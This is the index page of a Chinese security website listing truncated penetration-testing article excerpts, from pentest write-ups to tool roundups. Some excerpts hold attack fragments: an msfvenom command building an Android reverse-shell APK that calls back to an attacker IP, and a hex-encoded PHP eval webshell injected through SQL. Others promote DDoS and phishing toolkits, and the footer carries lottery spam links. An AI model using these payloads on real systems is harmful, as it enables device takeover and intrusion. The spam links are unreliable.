安基网 首页 安全渗透测试
订阅

渗透测试

  • 一次授权的渗透测试

    一次授权的渗透测试
    一次正规且授权的测试,未使用任何扫描器,全程手工。这个客户呢是做的一个培训资料的商城。大概样子就是这样,其实当时拿到以后客户说不允许用任何扫描器,还有一点点懵。Thinkphp5.1.37 LTS 加 JQuery 1.7.2开始首先一个账户是必须要有的,难处在于因为验证码还在对接中,没法注册。只能要一个内 ...
    2020-9-7 10:06
  • 分享10个渗透测试最佳工具的使用方法及下载链接

    分享10个渗透测试最佳工具的使用方法及下载链接
    渗透测试的目的不仅是找到安全系统的易受攻击元素,还要检查企业中安全策略的合规性,衡量任何安全问题的意识和范围,并查看可能性在真正的外部实体网络攻击事件中,网络可能会遇到什么灾难。实质上,渗透测试允许你发现可能没有考虑过的弱点区域。渗透测试者提供了一种全新的视角,帮助企业改进系统安 ...
    2020-9-1 08:49
  • 来路不明的安装包请勿安装

    来路不明的安装包请勿安装
    前言本次渗透为靶机测试。切勿用于非法用途!攻击者:192.168.1.3 termux+metasploit受害者:192.168.1.2 Android 5.1 - Linux 3.10.72+ (aarch64)使用模块:multi/handler首先生成安卓木马msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=3800 -o s.apk将其移动到/storage/emulate ...
    2020-9-1 08:43
  • 内网渗透:不出网渗透技巧

    内网渗透:不出网渗透技巧
    搜索公众号:暗网黑客可领全套网络安全渗透教程、配套攻防靶场作者:诺言转载自:https://www.freebuf.com/articles/web/247287.html前言最近打了几场**,遇到几个内网环境都不通外网,整理下用到的几种不出网内网渗透技巧。socks隧道搭建常用工具:reGeorg,Proxifier用的比较多的一个隧道代理工具1、 ...
    2020-8-30 07:16
  • 渗透测试工具库

    渗透测试工具库
    搜索公众号:暗网黑客可领全套网络安全渗透教程、配套攻防靶场本地工具dirmap 子目录扫描https://gitee.com/c0ny10/dirmapsubDomainBrute 子域名扫描https://gitee.com/c0ny10/subDomainsBruteCknife WebShell管理工具https://gitee.com/c0ny10/cknifeJSFinder 快速在网站的js文件中提取URL,子域名htt ...
    2020-8-30 07:14
  • 白帽子黑客教你:如何使用Dirbuster网站目录扫描神器?

    白帽子黑客教你:如何使用Dirbuster网站目录扫描神器?
    声明:本头条号分享仅做学习交流,请自觉遵守网络安全法等法律法规!据说点击了解更多,还有更多干货!但这干货有没有用,等你看了再说!一、背景介绍DirBuster是用来探测web服务器上的目录和隐藏文件的。因为DirBuster是采用java编写的,所以运行前要安装上java的环境。 来看一下基本的使用: ①:Tar ...
    2020-8-30 07:13
  • Web渗透测试——验证码自动识别工具

    Web渗透测试——验证码自动识别工具
    我们在网站登录界面,为了安全起见,除了填写用户名和密码之外,还会要求用户输入验证码才能进行登录,验证码的作用最主要的是验证输入方是一个在电脑前正在输入的人,而不是某些程序模拟人的登录操作,这样就能有效地避免网站被攻击者进行暴力破解,从而非法获得网站的登录权限,验证码的种类也是多种 ...
    2020-8-22 16:17
  • ZanTI v3.18全功能完美中文版【网络渗透】

    ZanTI v3.18全功能完美中文版【网络渗透】
    这是一款安全测试工具,zANTI渗透测试,支持嗅探已连接的网络,来进行中间人攻击、端口扫描、cookie获取、路由安全、跑字典、抓包修改、远程控制、漏洞扫描、劫持等操作。该版本已汉化和免登录,需要root权限和busybox(瑞士小军刀),不可放vmos里运行哦。扫描网络功能开关最好玩的其实也是中间人, ...
    2020-8-18 03:37
  • 一次bypass Xss-waf的经历

    一次bypass Xss-waf的经历
    那原本是一个Happy的夜晚,我搞了二两小白酒,听到领导发来的消息,还TM喝酒,加班了! 接到测试网站,利用crawlergo+XRAY扫到了一个xss,这是入口点。打开网页长这个样子。 利用点在keyword参数
    2020-8-15 15:24
  • 黑客大神告诉你:Getshell总结

    黑客大神告诉你:Getshell总结
    无论是常规渗透测试还是攻防对抗,亦或黑灰产对抗、APT攻击,getshell 是一个从内到外的里程碑成果。我们接下来总结下常见拿shell的一些思路和方法。文中可能有一些不足之处,还望大佬不吝赐教。0x01 注入getshell一般前提条件:有权限、知道路径mysqlselect 0x3c3f70687020a6576616c28245f504f53545b6 ...
    2020-8-12 19:01
  • 工控渗透框架ISF介绍:信息收集篇

    工控渗透框架ISF介绍:信息收集篇
    框架介绍声明:ISF该框架是北京xx科技基于开源框架自研的一套工控渗透框架,仅用于工控安全教学,公司实验箱产品的安全研究,使用该框架进行非法操作产生的一切后果公司一概不负责。框架主要使用Python语言开发,通过集成ShadowBroker释放的NSA工具Fuzzbunch攻击框架,开发一款适合工控漏洞利用的框架 ...
    2020-8-10 01:30
  • 渗透测试——漏洞扫描工具整理

    渗透测试——漏洞扫描工具整理
    渗透测试收集信息完成后,就要根据所收集的信息,扫描目标站点可能存在的漏洞了,包括我们之前提到过的如:SQL注入漏洞、跨站脚本漏洞、文件上传漏洞、文件包含漏洞及命令执行漏洞等,通过这些已知的漏洞,来寻找目标站点的突破口,在这之前我们可能就已经接触过许多漏洞靶场,练习过各种漏洞的攻击方 ...
    2020-7-23 11:23
  • 黑客全家桶:hackingtool

    黑客全家桶:hackingtool
    New ALL IN ONE 黑客全家桶:hackingtool 收录 Hackers 所需的大部分工具,包括 SQL 注入、钓鱼攻击、Hash 破解、XSS、DDos 攻击等等分类工具。
    2020-7-16 12:31
  • 记一次实战给朋友站点测试

    记一次实战给朋友站点测试
    本篇文章为给朋友网站测试的过程,主要记录测试中的思路。期间用了差不多两个周末,期间断断续续,整篇没啥奇淫技巧,大佬略过。 PS:截至投稿前,已将漏洞详细报告提交朋友,并验证已经修复。二、信息收集通过朋友给的域名进行子域名爆破,得到如下: ...
    2020-7-14 13:23
  • 实战渗透违法钓鱼网站实记

    实战渗透违法钓鱼网站实记
    同IP渗透偶然打开一个咸鱼钓鱼网站,发现是TP3.2.3开发的,本想直接利用tp3可以直接查看runtime日志来获取他的后台账号密码的,发现并没有开启debug模式,所以无法查看到日志信息。对这个站进行信息收集,进行同ip的反查,发现7个地址每个域名又是不同的源码发开的,发现一个thinkphp5.0.23的网站,可 ...
    2020-7-10 00:22
  • 最新
    返回顶部
    湖南快乐十分走势 内蒙古11选5开奖 长江彩票计划群 必发彩票计划群 上海11选5 旺旺彩票计划群 苹果彩票计划群 极速赛车开奖辅助 上海11选5开奖 江苏11选5平台